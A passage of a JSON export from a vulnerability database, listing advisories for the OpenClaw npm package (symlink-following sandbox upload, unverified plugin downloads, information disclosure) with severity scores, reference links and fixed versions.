"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41335", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41335" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json" }, { "reference_url": "https://github.com/advisories/GHSA-hr8g-2q7x-3f4w", "reference_id": "GHSA-hr8g-2q7x-3f4w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hr8g-2q7x-3f4w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41335", "GHSA-hr8g-2q7x-3f4w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c76v-4577-n7c6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89380?format=api", "vulnerability_id": "VCID-carm-gpgh-wbbf", "summary": "OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n## Summary\nSSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41364", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00191", "scoring_system": "epss", "scoring_elements": "0.40948", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00191", "scoring_system": "epss", "scoring_elements": "0.40921", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00191", "scoring_system": "epss", "scoring_elements": "0.40952", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41364" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41364", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41364" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload" }, { "reference_url": "https://github.com/advisories/GHSA-fv94-qvg8-xqpw", "reference_id": "GHSA-fv94-qvg8-xqpw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fv94-qvg8-xqpw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41364", "GHSA-fv94-qvg8-xqpw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-carm-gpgh-wbbf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89367?format=api", "vulnerability_id": "VCID-cbuu-4d6c-rben", "summary": "OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification\n## Impact\n\nB-M3: ClawHub package downloads are not enforced with integrity verification.\n\nClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42428", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.059", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05897", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05906", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42428" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42428", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42428" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads" }, { "reference_url": "https://github.com/advisories/GHSA-3vvq-q2qc-7rmp", "reference_id": "GHSA-3vvq-q2qc-7rmp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3vvq-q2qc-7rmp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": 